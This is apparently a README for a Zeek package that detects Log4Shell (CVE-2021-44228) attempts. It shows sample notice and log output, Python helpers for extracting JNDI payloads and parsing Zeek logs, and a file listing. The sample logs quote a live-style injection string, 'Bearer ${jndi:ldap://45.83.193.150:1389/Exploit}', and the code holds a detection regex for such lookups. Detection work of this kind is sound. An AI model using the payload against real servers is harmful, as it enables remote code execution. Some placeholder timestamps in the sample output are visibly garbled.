Related vulnerability
Description
Log4j Exploit Detection Logic for Zeek
Introduction
# CVE-2021-44228
A Zeek package which raises notices, tags HTTP connections and optionally generates a log for Log4J
(CVE-2021-44228) attempts.
- Detects payload contained in HTTP headers: See [Simplifying Detection of
Log4Shell](https://corelight.com/blog/simplifying-detection-of-log4shell) for
details.
- [Uses Zeek signatures](scripts/ldap_java.sig) to generate notices when a Java file is
returned during an LDAP search. See [Detecting Log4j via Zeek & LDAP traffic](https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic) for
details.
- Detects when a second-stage Java class is downloaded, regardless of whether the payload or the first stage was detected. See [Detecting Log4j exploits via Zeek when Java downloads Java](https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java) for details.
## Installation
`$ zkg install cve-2021-44228`
Use against a pcap you already have:
`$ zeek -Cr scripts/__load__.zeek your.pcap`
If you install from a `git clone`'d version of the repository, note that it
defaults to the development branch. Install from `master` or a release for a
more stable version of the package.
## Options and notes
- `CVE_2021_44228::log` determines whether the `log4j` log is generated. Defaults to `T`.
- `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s to ignore. It is a `set[string]`, so both IPs and domains can be ignored.
- `CVE_2021_44228::ignorable_orig_hosts` is a set of `addr`s of known benign scanners that can be ignored.
- `CVE_2021_44228::ignorable_resp_hosts` is the same as above, but for responder (`resp`) addresses.
- `CVE_2021_44228::try_normalize` determines whether normalizing the payload should be attempted. Defaults to `T`.
## Example Notices
This package generates three distinct notices:
1. `LOG4J_ATTEMPT_HEADER`
1. `LOG4J_LDAP_JAVA`
1. `LOG4J_JAVA_CLASS_DOWNLOAD`
`LOG4J_ATTEMPT_HEADER` flags potential attempts based on HTTP header data. These are also logged to `log4j` if enabled.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-14-11-50-29
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639350256.733555 Cp7gaS3nVqVl49obpb 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-14-11-50-29
```
`LOG4J_LDAP_JAVA` detects LDAP downloading Java bytecode. In practice, we see
this happen infrequently enough that it makes for a good proxy detection for
possibly successful exploits.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open 2021-12-16-20-54-13
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425815.885952 ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
1639425834.635341 CUM0KZ3MLUfNB0cl11 172.16.238.10 57742 172.16.238.11 1389 - - - tcp Signatures::Sensitive_Signature 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... 172.16.238.11 172.16.238.10 1389 - - Notice::ACTION_LOG (empty) 3600.000000 - - - - -
#close 2021-12-16-20-54-13
```
Finally, `LOG4J_JAVA_CLASS_DOWNLOAD` generates a notice when we are confident
that Java downloads more Java. As above, this happens sufficiently rarely to be
a useful proxy detection.
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path notice
#open XXXX-XX-XX-XX-XX-XX
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude
#types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double
XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - -
#close 2021-12-126-19-17-58
```
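The following Python is an added example, not code from this package: it reproduces, outside Zeek, the fields the `LOG4J_ATTEMPT_HEADER` notice derives from a header (`uri`, `stem`, `target_host`, `target_port`, `matched_name`, `matched_value`), applies suppression sets shaped like the `ignorable_*` options, and checks the two indicators the `LOG4J_JAVA_CLASS_DOWNLOAD` notice shows (a `Java/` user agent fetching `application/java-vm`). The ignore-list values, the optional `known_targets` correlation and the `high`/`medium` labels are this example's own assumptions.

```python
import re

# Constructed ignore lists mirroring the package's options (not the project's own values):
IGNORABLE_TARGET_HOSTS = {"canary.example.test"}  # cf. CVE_2021_44228::ignorable_target_hosts
IGNORABLE_ORIG_HOSTS = {"10.0.0.5"}                # cf. CVE_2021_44228::ignorable_orig_hosts

# The ${jndi:<scheme>:<target>} lookup form seen in the notice above; the sample only
# shows 'ldap', so the scheme is captured rather than hard-coded.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-zA-Z]+):(?P<target>[^}]*)\}")

def extract_payload(http_uri, name, value):
    """Return a record with the log4j.log columns (uri, stem, target_host, ...) or None."""
    in_name, in_value = JNDI_RE.search(name), JNDI_RE.search(value)
    match = in_value or in_name
    if match is None:
        return None
    target = match.group("target").lstrip("/")   # e.g. 45.83.193.150:1389/Exploit
    stem = target.partition("/")[0]              # e.g. 45.83.193.150:1389
    host, _, port = stem.rpartition(":")
    if not host:                                 # bare host, no port given
        host, port = stem, ""
    return {
        "http_uri": http_uri, "uri": target, "stem": stem,
        "target_host": host, "target_port": int(port) if port.isdigit() else None,
        "name": name, "value": value,
        "matched_name": in_name is not None, "matched_value": in_value is not None,
    }

def should_ignore(record, orig_h, targets=IGNORABLE_TARGET_HOSTS, origs=IGNORABLE_ORIG_HOSTS):
    """Suppress what the options describe: known-benign scanner sources and
    callback targets you control (for example your own canary host)."""
    return orig_h in origs or record["target_host"] in targets

def is_second_stage(user_agent, content_type, host, known_targets=()):
    """Indicators behind LOG4J_JAVA_CLASS_DOWNLOAD: a Java client pulling Java bytecode.
    Assumed labels: 'high' if the server was also seen as a JNDI callback target, else 'medium'."""
    if not (user_agent.startswith("Java/") and content_type.lower() == "application/java-vm"):
        return None
    return "high" if host in known_targets else "medium"
```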
## Example Log (`log4j.log`)
```
#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path log4j
#open 2021-12-14-11-50-29
#fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value
#types time string string string string string string string bool string string bool bool
1639350256.733555 Cp7gaS3nVqVl49obpb / 45.83.193.150:1389/Exploit 45.83.193.150:1389 45.83.193.150 1389 GET T AUTHORIZATION Bearer ${jndi:ldap://45.83.193.150:1389/Exploit} F T
#close 2021-12-14-11-50-29
```
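An added example (not part of this package) of reading the `log4j.log` shown above offline: a small reader for Zeek's ASCII log format that honours the `#separator`, `#unset_field` and `#empty_field` headers and types each column from `#types`, then lists the distinct JNDI callback stems for hunting in other logs. The embedded log is a constructed copy of the sample above; note that `target_port` is typed `string` in this log, so it stays text.

```python
# Constructed copy of the log4j.log sample above (Zeek ASCII writer, tab-separated).
SAMPLE_LOG4J_LOG = "\n".join([
    "#separator \\x09",
    "#unset_field\t-",
    "#fields\tts\tuid\thttp_uri\turi\tstem\ttarget_host\ttarget_port\tmethod\tis_orig"
    "\tname\tvalue\tmatched_name\tmatched_value",
    "#types\ttime\tstring\tstring\tstring\tstring\tstring\tstring\tstring\tbool"
    "\tstring\tstring\tbool\tbool",
    "1639350256.733555\tCp7gaS3nVqVl49obpb\t/\t45.83.193.150:1389/Exploit"
    "\t45.83.193.150:1389\t45.83.193.150\t1389\tGET\tT\tAUTHORIZATION"
    "\tBearer ${jndi:ldap://45.83.193.150:1389/Exploit}\tF\tT",
])

def _coerce(value, ztype, opts):
    """Convert one field by its Zeek type name; sets/vectors are left as raw text."""
    if value == opts["unset_field"]:
        return None
    if value == opts["empty_field"]:
        return ""
    if ztype in ("time", "double", "interval"):
        return float(value)
    if ztype in ("count", "int", "port"):
        return int(value)
    if ztype == "bool":
        return value == "T"
    return value  # string, addr, enum and anything else stay as text

def parse_zeek_log(text):
    """Parse a Zeek ASCII log into dict rows typed per its #fields/#types headers."""
    sep, fields, types, rows = "\t", None, None, []
    opts = {"set_separator": ",", "unset_field": "-", "empty_field": "(empty)"}
    for line in text.splitlines():
        if line.startswith("#separator "):  # the one header written with a space
            sep = line.split(" ", 1)[1].encode().decode("unicode_escape")
        elif line.startswith("#"):
            key, _, val = line[1:].partition(sep)
            if key == "fields":
                fields = val.split(sep)
            elif key == "types":
                types = val.split(sep)
            elif key in opts:
                opts[key] = val
        elif line:
            if not fields or not types:
                raise ValueError("data row before #fields/#types header")
            rows.append({f: _coerce(v, t, opts) for f, v, t in zip(fields, line.split(sep), types)})
    return rows

def callback_stems(rows):  # distinct JNDI callback host:port values for hunting
    return sorted({r["stem"] for r in rows if r["stem"]})
```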
## References
1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
1. https://corelight.com/blog/simplifying-detection-of-log4shell
File snapshot
[4.0K] /data/pocs/6fe6a5fe26737b3ac84fd2b13a06cb8b723b4af2
├── [1.5K] LICENSE
├── [8.6K] README.md
├── [4.0K] scripts
│ ├── [3.4K] CVE_2021_44228_java_GET.zeek
│ ├── [ 11K] CVE_2021_44228.zeek
│ ├── [ 499] ldap_java.sig
│ ├── [ 84] __load__.zeek
│ └── [8.2K] tests.zeek
├── [4.0K] testing
│ ├── [4.0K] Baseline
│ │ ├── [4.0K] log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ │ └── [ 18K] notice.log
│ │ ├── [4.0K] log4j.ldap_java
│ │ │ ├── [2.2K] notice.log
│ │ │ └── [1.2K] signatures.log
│ │ ├── [4.0K] log4j.log4j-attack
│ │ │ └── [1.7K] notice.log
│ │ ├── [4.0K] log4j.log4j-dns_exfil
│ │ │ └── [1.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-log
│ │ │ ├── [ 613] log4j.log
│ │ │ └── [ 617] log4shell.log
│ │ ├── [4.0K] log4j.log4j-user_agent
│ │ │ └── [2.3K] notice.log
│ │ ├── [4.0K] log4j.log4j-webapp
│ │ │ └── [2.2K] notice.log
│ │ ├── [4.0K] log4j.notice
│ │ │ ├── [1015] http.log
│ │ │ └── [1.3K] notice.log
│ │ └── [4.0K] log4j.unit
│ │ └── [1.7K] output
│ ├── [ 558] btest.cfg
│ ├── [4.0K] Files
│ │ └── [ 192] random.seed
│ ├── [4.0K] log4j
│ │ ├── [ 210] 2021-12-11-thru-13-server-activity-with-log4j-attempts
│ │ ├── [ 303] ignore-orig
│ │ ├── [ 301] ignore-resp
│ │ ├── [ 307] ignore-target
│ │ ├── [ 168] ldap_java.zeek
│ │ ├── [ 168] log4j-attack
│ │ ├── [ 171] log4j-dns_exfil
│ │ ├── [ 288] log4j-log
│ │ ├── [ 172] log4j-user_agent
│ │ ├── [ 168] log4j-webapp
│ │ ├── [ 235] notice
│ │ └── [ 154] unit
│ ├── [ 28] Makefile
│ ├── [4.0K] Scripts
│ │ ├── [ 383] diff-remove-timestamps
│ │ ├── [1.3K] get-zeek-env
│ │ └── [ 303] README
│ └── [4.0K] Traces
│ ├── [4.9M] 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap
│ ├── [ 11K] log4j-attack.pcap
│ ├── [4.0K] log4j-dns_exfil.pcap
│ ├── [ 41K] log4j-user_agent.pcap
│ ├── [ 41K] log4j-webapp.pcap
│ ├── [ 87] Readme
│ └── [1.8K] spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap
└── [ 342] zkg.meta
16 directories, 45 files